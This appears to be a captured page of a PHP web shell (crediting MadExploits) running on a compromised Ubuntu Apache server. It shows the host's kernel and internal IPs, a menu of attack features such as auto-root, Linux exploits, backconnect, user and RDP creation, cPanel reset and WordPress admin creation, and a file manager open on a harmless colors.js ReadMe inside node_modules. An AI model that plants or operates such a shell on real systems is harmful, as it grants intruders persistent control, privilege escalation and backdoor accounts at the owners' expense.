Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
colors /
[ HOME SHELL ]
Name
Size
Permission
Action
themes
[ DIR ]
drwxrwxr-x
MIT-LICENSE.txt
1.06
KB
-rw-rw-r--
ReadMe.md
1.27
KB
-rw-rw-r--
colors.js
10.4
KB
-rw-rw-r--
example.html
2.49
KB
-rw-rw-r--
example.js
2.37
KB
-rw-rw-r--
package.json
486
B
-rw-rw-r--
test.js
2.09
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ReadMe.md
# colors.js - get color and style in your node.js console ( and browser ) like what <img src="http://i.imgur.com/goJdO.png" border = "0"/> ## Installation npm install colors ## colors and styles! - bold - italic - underline - inverse - yellow - cyan - white - magenta - green - red - grey - blue - rainbow - zebra - random ## Usage ``` js var colors = require('./colors'); console.log('hello'.green); // outputs green text console.log('i like cake and pies'.underline.red) // outputs red underlined text console.log('inverse the color'.inverse); // inverses the color console.log('OMG Rainbows!'.rainbow); // rainbow (ignores spaces) ``` # Creating Custom themes ```js var colors = require('colors'); colors.setTheme({ silly: 'rainbow', input: 'grey', verbose: 'cyan', prompt: 'grey', info: 'green', data: 'grey', help: 'cyan', warn: 'yellow', debug: 'blue', error: 'red' }); // outputs red text console.log("this is an error".error); // outputs yellow text console.log("this is a warning".warn); ``` ### Contributors Marak (Marak Squires) Alexis Sellier (cloudhead) mmalecki (Maciej MaĆecki) nicoreed (Nico Reed) morganrallen (Morgan Allen) JustinCampbell (Justin Campbell) ded (Dustin Diaz) #### , Marak Squires , Justin Campbell, Dustin Diaz (@ded)
Close